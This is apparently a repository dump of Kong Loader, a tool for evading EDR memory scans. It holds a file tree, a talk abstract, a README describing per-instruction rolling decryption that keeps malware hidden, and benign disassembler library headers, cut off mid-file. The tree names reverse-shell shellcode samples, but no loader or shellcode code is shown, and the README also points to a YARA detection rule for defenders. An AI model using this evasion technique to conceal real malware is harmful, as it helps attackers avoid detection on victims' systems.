├── .github
├── CALL_FOR_PAPER.md
├── FUNDING.yml
├── banner.png
├── banner.psd
├── laughing.gif
└── workflows
│ └── compile.yml
├── .gitignore
├── LICENSE.md
├── README.md
├── dst
└── KongLoader.x64.exe
├── inc
├── Zycore
│ ├── API
│ │ ├── Memory.h
│ │ ├── Process.h
│ │ ├── Synchronization.h
│ │ ├── Terminal.h
│ │ └── Thread.h
│ ├── Allocator.h
│ ├── ArgParse.h
│ ├── Atomic.h
│ ├── Bitset.h
│ ├── Comparison.h
│ ├── Defines.h
│ ├── Format.h
│ ├── Internal
│ │ ├── AtomicGNU.h
│ │ └── AtomicMSVC.h
│ ├── LibC.h
│ ├── List.h
│ ├── Object.h
│ ├── Status.h
│ ├── String.h
│ ├── Types.h
│ ├── Vector.h
│ └── Zycore.h
└── Zydis
│ ├── Decoder.h
│ ├── DecoderTypes.h
│ ├── Defines.h
│ ├── Disassembler.h
│ ├── Encoder.h
│ ├── Formatter.h
│ ├── FormatterBuffer.h
│ ├── Generated
│ ├── EnumISAExt.h
│ ├── EnumISASet.h
│ ├── EnumInstructionCategory.h
│ ├── EnumMnemonic.h
│ └── EnumRegister.h
│ ├── Internal
│ ├── DecoderData.h
│ ├── EncoderData.h
│ ├── FormatterATT.h
│ ├── FormatterBase.h
│ ├── FormatterIntel.h
│ ├── SharedData.h
│ └── String.h
│ ├── MetaInfo.h
│ ├── Mnemonic.h
│ ├── Register.h
│ ├── Segment.h
│ ├── SharedTypes.h
│ ├── ShortString.h
│ ├── Status.h
│ ├── Utils.h
│ └── Zydis.h
├── lib
└── Zydis.c
├── makefile
├── sig
└── kong_loader_native_code.yara
└── src
├── KongLoader.c
├── helpers
├── CentralProcessingUnitHelper.c
├── ConsoleHelper.c
├── MaliciousMemoryHelper.c
└── ZydisHelper.c
└── shellcode
├── Custom-AccessViolation-1.c
├── Custom-ArgumentAsString-1.c
├── Custom-ArgumentOnStack-1.c
├── Custom-KitchenSink-1.c
├── Custom-Multiply-1.c
├── Custom-Storage-1.c
├── Custom-Syscall-1.c
├── Donut-MessageBoxA-1-Source.c
├── Donut-MessageBoxA-1.c
├── Msfvenom-MeterpreterReverseTCP-1.c
├── Msfvenom-MeterpreterReverseTCP-2.c
├── Msfvenom-ShellReverseTCP-1.c
├── Msfvenom-WinExec-1.c
├── Mythic-Hannibal-1.c
├── Nimplant-Raw-1.c
└── Your-Shellcode.c
/.github/CALL_FOR_PAPER.md:
--------------------------------------------------------------------------------
1 | # CFP
2 |
3 | ## Title
4 |
5 | The hidden ART of rolling shellcode decryption
6 |
7 | ## Duration
8 |
9 | 30 minutes
10 |
11 | ## Banner
12 |
13 | 
14 |
15 | ## Abstract
16 |
17 | Executing malicious shellcode may trigger memory scans by EDR, leading to detection of malware. Sleep masks were introduced to ensure that malware is encrypted in memory while it's idle (sleeping), aiming to prevent that detection. Using sleep masks, malware is decrypted after sleeping, executes commands, and is then encrypted and instructed to sleep again. This ensures that the malware is only briefly visible in memory.
18 |
19 | In this talk, I'll introduce Kong Loader, a completely new concept of loading shellcode. Kong Loader prevents malware from being visible in memory *entirely* and *whatsoever*, even while executing commands. For each assembly instruction, Kong Loader decrypts that specific assembly instruction, executes it, and encrypts it again. This means only the currently executing instruction is visible in memory.
20 |
21 | It comes with dangerous benefits for offensive security experts, and with new complex challenges for defenders & malware analysts. This briefing covers that all, and Kong Loader will be published during the briefing, so you can start experimenting with it yourself.
22 |
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | github: [tijme]
2 | custom: [paypal.me/tijmegommers]
3 |
--------------------------------------------------------------------------------
/.github/banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tijme/kong-loader/6b911e94fc2b2213333f1f5bce4ea72ab2d3dea8/.github/banner.png
--------------------------------------------------------------------------------
/.github/banner.psd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tijme/kong-loader/6b911e94fc2b2213333f1f5bce4ea72ab2d3dea8/.github/banner.psd
--------------------------------------------------------------------------------
/.github/laughing.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tijme/kong-loader/6b911e94fc2b2213333f1f5bce4ea72ab2d3dea8/.github/laughing.gif
--------------------------------------------------------------------------------
/.github/workflows/compile.yml:
--------------------------------------------------------------------------------
1 | name: Compile using `make`, then publish
2 |
3 | permissions:
4 | contents: write
5 |
6 | on:
7 | push:
8 | branches: ["master"]
9 | pull_request:
10 | branches: ["master"]
11 |
12 | jobs:
13 | build:
14 | runs-on: ubuntu-latest
15 | steps:
16 | - name: Checkout
17 | uses: actions/checkout@v3
18 | - name: Set up MinGW
19 | uses: egor-tensin/setup-mingw@v2
20 | with:
21 | platform: x64
22 | - name: Compile
23 | run: make
24 | - name: Get short SHA
25 | run: echo "SHORT_SHA=`echo ${GITHUB_SHA} | cut -c1-8`" >> $GITHUB_ENV
26 | - name: Release
27 | uses: softprops/action-gh-release@v2
28 | with:
29 | name: Release ${{ env.SHORT_SHA }}
30 | tag_name: tag-${{ env.SHORT_SHA }}
31 | files: |
32 | ./dst/*.exe
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Mozilla Public License (MPL) Version 2.0.
2 | #
3 | # Copyright (c) 2024 Tijme Gommers (@tijme).
4 | #
5 | # This source code file is part of Kong Loader. Kong Loader is
6 | # licensed under Mozilla Public License (MPL) Version 2.0, and
7 | # you are free to use, modify, and distribute this file under
8 | # its terms. However, any modified versions of this file must
9 | # include this same license and copyright notice.
10 |
11 | # General
12 | .DS_Store
13 | .AppleDouble
14 | .LSOverride
15 |
16 | # Icon must end with two \r
17 | Icon
18 |
19 |
20 | # Thumbnails
21 | ._*
22 |
23 | # Files that might appear in the root of a volume
24 | .DocumentRevisions-V100
25 | .fseventsd
26 | .Spotlight-V100
27 | .TemporaryItems
28 | .Trashes
29 | .VolumeIcon.icns
30 | .com.apple.timemachine.donotpresent
31 |
32 | # Directories potentially created on remote AFP share
33 | .AppleDB
34 | .AppleDesktop
35 | Network Trash Folder
36 | Temporary Items
37 | .apdisk
38 |
39 | # Prerequisites
40 | *.d
41 |
42 | # Object files
43 | *.o
44 | *.ko
45 | *.obj
46 | *.elf
47 |
48 | # Linker output
49 | *.ilk
50 | *.map
51 | *.exp
52 |
53 | # Precompiled Headers
54 | *.gch
55 | *.pch
56 |
57 | # Libraries
58 | *.a
59 | *.la
60 | *.lo
61 |
62 | # Shared objects (inc. Windows DLLs)
63 | *.so
64 | *.so.*
65 | *.dylib
66 |
67 | # Executables
68 | *.out
69 | *.app
70 | *.i*86
71 | *.x86_64
72 | *.hex
73 |
74 | # Debug files
75 | *.dSYM/
76 | *.su
77 | *.idb
78 | *.pdb
79 |
80 | # Kernel Module Compile Results
81 | *.mod*
82 | *.cmd
83 | .tmp_versions/
84 | modules.order
85 | Module.symvers
86 | Mkfile.old
87 | dkms.conf
88 |
89 | # Microsoft Office cache
90 | ~$*
91 |
92 | # Proprietary shellcodes'
93 | src/shellcode/Proprietary*
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 |
5 |
6 | 
7 |
8 |
9 | 
10 |
11 |
12 | 
13 |
14 |
15 |
16 | The hidden ART of rolling shellcode decryption.
17 |
18 | Built with ♥ by Tijme Gommers – Buy me a coffee via PayPal.
19 |
20 |
21 |
22 | Abstract
23 | •
24 | Getting started
25 | •
26 | Caveats
27 | •
28 | Future work
29 | •
30 | Issues & requests
31 | •
32 | License & copyright
33 |
34 |
35 |
36 | ## Abstract
37 |
38 | Executing malicious shellcode may trigger memory scans by EDR, leading to detection of your malware. Sleep masks were introduced to ensure that your malware is encrypted in memory while it's idle (sleeping), aiming to prevent that detection. Using sleep masks, your malware is decrypted after sleeping, executes commands, and is then encrypted and instructed to sleep again. This ensures that your malware is only briefly visible in memory.
39 |
40 | **Kong Loader** prevents your malware from being visible in memory *entirely* and *whatsoever*, even while executing commands. It uses rolling decryption, terminology I'm likely misusing, but which *does* represent how Kong Loader works. For each assembly instruction, Kong Loader decrypts that specific assembly instruction, executes it, and encrypts it again. This means only the currently executing instruction is visible in memory, which is insufficient for EDR to trigger detection on.
41 |
42 | ## Getting started
43 |
44 | Clone this repository first. Install the dependencies, then [review the code](https://github.com/tijme/kong-loader/blob/master/.github/laughing.gif) and compile it from source. The steps below were tested on MacOS x64 and arm64.
45 |
46 | **Dependencies**
47 |
48 | * [MinGW](https://formulae.brew.sh/formula/mingw-w64)
49 |
50 | **Compiling**
51 |
52 | make
53 |
54 | **Usage**
55 |
56 | Execute `./dst/KongLoader.x64.exe` on your Windows target machine.
57 |
58 | ## Caveats
59 |
60 | There are various caveats, for both offensive & defensive cyber security. Some examples:
61 |
62 | * Memory corruptions might occur if the shellcode tries to alter itself during runtime.
63 | * Kong Loader's native code can be signatured and thus easily detected.
64 | * The execution is extremely slow, and can currently only be used for tiny first stage malware.
65 | - Use [Relocatable](https://github.com/tijme/relocatable) to develop your tiny & truly Position Independent Code (PIC).
66 | * Malware that runs using Kong Loader can be hardly debugged.
67 | - Exceptions trigger in your debugger, for every single instruction.
68 | - Exceptions can't be dismissed, as they decrypt the instruction to be executed.
69 | - Ignoring the exceptions using `sxi sse` (windbg) adds millions of instructions per instruction to be executed.
70 | * Multi-threading is not supported as encryption race conditions would occur.
71 |
72 | ## Detection
73 |
74 | At this moment, it is quite easy to detect Kong Loader because Kong Loader's native code is static and can therefore be signatured. There is no polymorphic engine yet that modifies the static code during each build. The following files contains rules that allows you to detect Kong Loader:
75 |
76 | * [`kong_loader_native_code.yara` (Yara)](https://github.com/tijme/kong-loader/blob/master/sig/kong_loader_native_code.yara)
77 |
78 | ## Future work
79 |
80 | * Write a shellcode transpiler that transpiles to a interpretable format that prevents the need of a disassembler.
81 | - This essentialy moves the Kong Loader funcionality from runtime to compile time.
82 | * Possibly decrypt full basic blocks instead of single instructions, to improve speed.
83 | * Make use of a polymorphic engine to ensure that the native code does not contain static signatures.
84 |
85 | ## Issues & requests
86 |
87 | Issues or new feature requests can be reported via the [issue tracker](https://github.com/tijme/kong-loader/issues). Please make sure your issue or feature has not yet been reported by anyone else before submitting a new one.
88 |
89 | ## License & copyright
90 |
91 | Copyright (c) 2024 Tijme Gommers. Kong Loader is released under the Mozilla Public License Version 2.0. View [LICENSE.md](https://github.com/tijme/kong-loader/blob/master/LICENSE.md) for the full license. Kong Loader depends on [Zydis](https://zydis.re/), which is licenced under the [MIT Licence](https://github.com/zyantific/zydis/blob/master/LICENSE).
92 |
--------------------------------------------------------------------------------
/dst/KongLoader.x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tijme/kong-loader/6b911e94fc2b2213333f1f5bce4ea72ab2d3dea8/dst/KongLoader.x64.exe
--------------------------------------------------------------------------------
/inc/Zycore/API/Memory.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * @brief
30 | */
31 |
32 | #ifndef ZYCORE_API_MEMORY_H
33 | #define ZYCORE_API_MEMORY_H
34 |
35 | #include
36 | #include
37 | #include
38 |
39 | #ifndef ZYAN_NO_LIBC
40 |
41 | #if defined(ZYAN_WINDOWS)
42 | # include
43 | #elif defined(ZYAN_POSIX)
44 | # include
45 | #else
46 | # error "Unsupported platform detected"
47 | #endif
48 |
49 | /* ============================================================================================== */
50 | /* Enums and types */
51 | /* ============================================================================================== */
52 |
53 | /**
54 | * Defines the `ZyanMemoryPageProtection` enum.
55 | */
56 | typedef enum ZyanMemoryPageProtection_
57 | {
58 | #if defined(ZYAN_WINDOWS)
59 |
60 | ZYAN_PAGE_READONLY = PAGE_READONLY,
61 | ZYAN_PAGE_READWRITE = PAGE_READWRITE,
62 | ZYAN_PAGE_EXECUTE = PAGE_EXECUTE,
63 | ZYAN_PAGE_EXECUTE_READ = PAGE_EXECUTE_READ,
64 | ZYAN_PAGE_EXECUTE_READWRITE = PAGE_EXECUTE_READWRITE
65 |
66 | #elif defined(ZYAN_POSIX)
67 |
68 | ZYAN_PAGE_READONLY = PROT_READ,
69 | ZYAN_PAGE_READWRITE = PROT_READ | PROT_WRITE,
70 | ZYAN_PAGE_EXECUTE = PROT_EXEC,
71 | ZYAN_PAGE_EXECUTE_READ = PROT_EXEC | PROT_READ,
72 | ZYAN_PAGE_EXECUTE_READWRITE = PROT_EXEC | PROT_READ | PROT_WRITE
73 |
74 | #endif
75 | } ZyanMemoryPageProtection;
76 |
77 | /* ============================================================================================== */
78 | /* Exported functions */
79 | /* ============================================================================================== */
80 |
81 | /* ---------------------------------------------------------------------------------------------- */
82 | /* General */
83 | /* ---------------------------------------------------------------------------------------------- */
84 |
85 | /**
86 | * Returns the system page size.
87 | *
88 | * @return The system page size.
89 | */
90 | ZYCORE_EXPORT ZyanU32 ZyanMemoryGetSystemPageSize(void);
91 |
92 | /**
93 | * Returns the system allocation granularity.
94 | *
95 | * The system allocation granularity specifies the minimum amount of bytes which can be allocated
96 | * at a specific address by a single call of `ZyanMemoryVirtualAlloc`.
97 | *
98 | * This value is typically 64KiB on Windows systems and equal to the page size on most POSIX
99 | * platforms.
100 | *
101 | * @return The system allocation granularity.
102 | */
103 | ZYCORE_EXPORT ZyanU32 ZyanMemoryGetSystemAllocationGranularity(void);
104 |
105 | /* ---------------------------------------------------------------------------------------------- */
106 | /* Memory management */
107 | /* ---------------------------------------------------------------------------------------------- */
108 |
109 | /**
110 | * Changes the memory protection value of one or more pages.
111 | *
112 | * @param address The start address aligned to a page boundary.
113 | * @param size The size.
114 | * @param protection The new page protection value.
115 | *
116 | * @return A zyan status code.
117 | */
118 | ZYCORE_EXPORT ZyanStatus ZyanMemoryVirtualProtect(void* address, ZyanUSize size,
119 | ZyanMemoryPageProtection protection);
120 |
121 | /**
122 | * Releases one or more memory pages starting at the given address.
123 | *
124 | * @param address The start address aligned to a page boundary.
125 | * @param size The size.
126 | *
127 | * @return A zyan status code.
128 | */
129 | ZYCORE_EXPORT ZyanStatus ZyanMemoryVirtualFree(void* address, ZyanUSize size);
130 |
131 | /* ---------------------------------------------------------------------------------------------- */
132 |
133 | /* ============================================================================================== */
134 |
135 | #endif /* ZYAN_NO_LIBC */
136 |
137 | #endif /* ZYCORE_API_MEMORY_H */
138 |
--------------------------------------------------------------------------------
/inc/Zycore/API/Process.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * @brief
30 | */
31 |
32 | #ifndef ZYCORE_API_PROCESS_H
33 | #define ZYCORE_API_PROCESS_H
34 |
35 | #include
36 | #include
37 |
38 | #ifndef ZYAN_NO_LIBC
39 |
40 | /* ============================================================================================== */
41 | /* Enums and types */
42 | /* ============================================================================================== */
43 |
44 |
45 |
46 | /* ============================================================================================== */
47 | /* Exported functions */
48 | /* ============================================================================================== */
49 |
50 | /* ---------------------------------------------------------------------------------------------- */
51 | /* General */
52 | /* ---------------------------------------------------------------------------------------------- */
53 |
54 | /**
55 | * @brief Flushes the process instruction cache.
56 | *
57 | * @param address The address.
58 | * @param size The size.
59 | *
60 | * @return A zyan status code.
61 | */
62 | ZYCORE_EXPORT ZyanStatus ZyanProcessFlushInstructionCache(void* address, ZyanUSize size);
63 |
64 | /* ---------------------------------------------------------------------------------------------- */
65 |
66 | /* ============================================================================================== */
67 |
68 | #endif /* ZYAN_NO_LIBC */
69 |
70 | #endif /* ZYCORE_API_PROCESS_H */
71 |
--------------------------------------------------------------------------------
/inc/Zycore/API/Synchronization.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * @brief
30 | */
31 |
32 | #ifndef ZYCORE_API_SYNCHRONIZATION_H
33 | #define ZYCORE_API_SYNCHRONIZATION_H
34 |
35 | #include
36 | #include
37 |
38 | #ifndef ZYAN_NO_LIBC
39 |
40 | #ifdef __cplusplus
41 | extern "C" {
42 | #endif
43 |
44 | /* ============================================================================================== */
45 | /* Enums and types */
46 | /* ============================================================================================== */
47 |
48 | #if defined(ZYAN_POSIX)
49 |
50 | #include
51 |
52 | /* ---------------------------------------------------------------------------------------------- */
53 | /* Critical Section */
54 | /* ---------------------------------------------------------------------------------------------- */
55 |
56 | typedef pthread_mutex_t ZyanCriticalSection;
57 |
58 | /* ---------------------------------------------------------------------------------------------- */
59 |
60 | #elif defined(ZYAN_WINDOWS)
61 |
62 | #include
63 |
64 | /* ---------------------------------------------------------------------------------------------- */
65 | /* Critical Section */
66 | /* ---------------------------------------------------------------------------------------------- */
67 |
68 | typedef CRITICAL_SECTION ZyanCriticalSection;
69 |
70 | /* ---------------------------------------------------------------------------------------------- */
71 |
72 | #else
73 | # error "Unsupported platform detected"
74 | #endif
75 |
76 | /* ============================================================================================== */
77 | /* Exported functions */
78 | /* ============================================================================================== */
79 |
80 | /* ---------------------------------------------------------------------------------------------- */
81 | /* Critical Section */
82 | /* ---------------------------------------------------------------------------------------------- */
83 |
84 | /**
85 | * Initializes a critical section.
86 | *
87 | * @param critical_section A pointer to the `ZyanCriticalSection` struct.
88 | */
89 | ZYCORE_EXPORT ZyanStatus ZyanCriticalSectionInitialize(ZyanCriticalSection* critical_section);
90 |
91 | /**
92 | * Enters a critical section.
93 | *
94 | * @param critical_section A pointer to the `ZyanCriticalSection` struct.
95 | */
96 | ZYCORE_EXPORT ZyanStatus ZyanCriticalSectionEnter(ZyanCriticalSection* critical_section);
97 |
98 | /**
99 | * Tries to enter a critical section.
100 | *
101 | * @param critical_section A pointer to the `ZyanCriticalSection` struct.
102 | *
103 | * @return Returns `ZYAN_TRUE` if the critical section was successfully entered or `ZYAN_FALSE`,
104 | * if not.
105 | */
106 | ZYCORE_EXPORT ZyanBool ZyanCriticalSectionTryEnter(ZyanCriticalSection* critical_section);
107 |
108 | /**
109 | * Leaves a critical section.
110 | *
111 | * @param critical_section A pointer to the `ZyanCriticalSection` struct.
112 | */
113 | ZYCORE_EXPORT ZyanStatus ZyanCriticalSectionLeave(ZyanCriticalSection* critical_section);
114 |
115 | /**
116 | * Deletes a critical section.
117 | *
118 | * @param critical_section A pointer to the `ZyanCriticalSection` struct.
119 | */
120 | ZYCORE_EXPORT ZyanStatus ZyanCriticalSectionDelete(ZyanCriticalSection* critical_section);
121 |
122 | /* ---------------------------------------------------------------------------------------------- */
123 |
124 | /* ============================================================================================== */
125 |
126 | #ifdef __cplusplus
127 | }
128 | #endif
129 |
130 | #endif /* ZYAN_NO_LIBC */
131 |
132 | #endif /* ZYCORE_API_SYNCHRONIZATION_H */
133 |
--------------------------------------------------------------------------------
/inc/Zycore/API/Terminal.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file Provides cross-platform terminal helper functions.
29 | * @brief
30 | */
31 |
32 | #ifndef ZYCORE_API_TERMINAL_H
33 | #define ZYCORE_API_TERMINAL_H
34 |
35 | #include
36 | #include
37 |
38 | #ifdef __cplusplus
39 | extern "C" {
40 | #endif
41 |
42 | #ifndef ZYAN_NO_LIBC
43 |
44 | /* ============================================================================================== */
45 | /* VT100 CSI SGR sequences */
46 | /* ============================================================================================== */
47 |
48 | /* ---------------------------------------------------------------------------------------------- */
49 | /* General */
50 | /* ---------------------------------------------------------------------------------------------- */
51 |
52 | #define ZYAN_VT100SGR_RESET "\033[0m"
53 |
54 | /* ---------------------------------------------------------------------------------------------- */
55 | /* Foreground colors */
56 | /* ---------------------------------------------------------------------------------------------- */
57 |
58 | #define ZYAN_VT100SGR_FG_DEFAULT "\033[39m"
59 |
60 | #define ZYAN_VT100SGR_FG_BLACK "\033[30m"
61 | #define ZYAN_VT100SGR_FG_RED "\033[31m"
62 | #define ZYAN_VT100SGR_FG_GREEN "\033[32m"
63 | #define ZYAN_VT100SGR_FG_YELLOW "\033[33m"
64 | #define ZYAN_VT100SGR_FG_BLUE "\033[34m"
65 | #define ZYAN_VT100SGR_FG_MAGENTA "\033[35m"
66 | #define ZYAN_VT100SGR_FG_CYAN "\033[36m"
67 | #define ZYAN_VT100SGR_FG_WHITE "\033[37m"
68 | #define ZYAN_VT100SGR_FG_BRIGHT_BLACK "\033[90m"
69 | #define ZYAN_VT100SGR_FG_BRIGHT_RED "\033[91m"
70 | #define ZYAN_VT100SGR_FG_BRIGHT_GREEN "\033[92m"
71 | #define ZYAN_VT100SGR_FG_BRIGHT_YELLOW "\033[93m"
72 | #define ZYAN_VT100SGR_FG_BRIGHT_BLUE "\033[94m"
73 | #define ZYAN_VT100SGR_FG_BRIGHT_MAGENTA "\033[95m"
74 | #define ZYAN_VT100SGR_FG_BRIGHT_CYAN "\033[96m"
75 | #define ZYAN_VT100SGR_FG_BRIGHT_WHITE "\033[97m"
76 |
77 | /* ---------------------------------------------------------------------------------------------- */
78 | /* Background color */
79 | /* ---------------------------------------------------------------------------------------------- */
80 |
81 | #define ZYAN_VT100SGR_BG_DEFAULT "\033[49m"
82 |
83 | #define ZYAN_VT100SGR_BG_BLACK "\033[40m"
84 | #define ZYAN_VT100SGR_BG_RED "\033[41m"
85 | #define ZYAN_VT100SGR_BG_GREEN "\033[42m"
86 | #define ZYAN_VT100SGR_BG_YELLOW "\033[43m"
87 | #define ZYAN_VT100SGR_BG_BLUE "\033[44m"
88 | #define ZYAN_VT100SGR_BG_MAGENTA "\033[45m"
89 | #define ZYAN_VT100SGR_BG_CYAN "\033[46m"
90 | #define ZYAN_VT100SGR_BG_WHITE "\033[47m"
91 | #define ZYAN_VT100SGR_BG_BRIGHT_BLACK "\033[100m"
92 | #define ZYAN_VT100SGR_BG_BRIGHT_RED "\033[101m"
93 | #define ZYAN_VT100SGR_BG_BRIGHT_GREEN "\033[102m"
94 | #define ZYAN_VT100SGR_BG_BRIGHT_YELLOW "\033[103m"
95 | #define ZYAN_VT100SGR_BG_BRIGHT_BLUE "\033[104m"
96 | #define ZYAN_VT100SGR_BG_BRIGHT_MAGENTA "\033[105m"
97 | #define ZYAN_VT100SGR_BG_BRIGHT_CYAN "\033[106m"
98 | #define ZYAN_VT100SGR_BG_BRIGHT_WHITE "\033[107m"
99 |
100 | /* ---------------------------------------------------------------------------------------------- */
101 |
102 | /* ============================================================================================== */
103 | /* Enums and types */
104 | /* ============================================================================================== */
105 |
106 | /**
107 | * Declares the `ZyanStandardStream` enum.
108 | */
109 | typedef enum ZyanStandardStream_
110 | {
111 | /**
112 | * The default input stream.
113 | */
114 | ZYAN_STDSTREAM_IN,
115 | /**
116 | * The default output stream.
117 | */
118 | ZYAN_STDSTREAM_OUT,
119 | /**
120 | * The default error stream.
121 | */
122 | ZYAN_STDSTREAM_ERR
123 | } ZyanStandardStream;
124 |
125 | /* ============================================================================================== */
126 | /* Exported functions */
127 | /* ============================================================================================== */
128 |
129 | /**
130 | * Enables VT100 ansi escape codes for the given stream.
131 | *
132 | * @param stream Either `ZYAN_STDSTREAM_OUT` or `ZYAN_STDSTREAM_ERR`.
133 | *
134 | * @return A zyan status code.
135 | *
136 | * This functions returns `ZYAN_STATUS_SUCCESS` on all non-Windows systems without performing any
137 | * operations, assuming that VT100 is supported by default.
138 | *
139 | * On Windows systems, VT100 functionality is only supported on Windows 10 build 1607 (anniversary
140 | * update) and later.
141 | */
142 | ZYCORE_EXPORT ZyanStatus ZyanTerminalEnableVT100(ZyanStandardStream stream);
143 |
144 | /**
145 | * Checks, if the given standard stream reads from or writes to a terminal.
146 | *
147 | * @param stream The standard stream to check.
148 | *
149 | * @return `ZYAN_STATUS_TRUE`, if the stream is bound to a terminal, `ZYAN_STATUS_FALSE` if not,
150 | * or another zyan status code if an error occured.
151 | */
152 | ZYCORE_EXPORT ZyanStatus ZyanTerminalIsTTY(ZyanStandardStream stream);
153 |
154 | /* ============================================================================================== */
155 |
156 | #endif // ZYAN_NO_LIBC
157 |
158 | #ifdef __cplusplus
159 | }
160 | #endif
161 |
162 | #endif /* ZYCORE_API_TERMINAL_H */
163 |
--------------------------------------------------------------------------------
/inc/Zycore/API/Thread.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
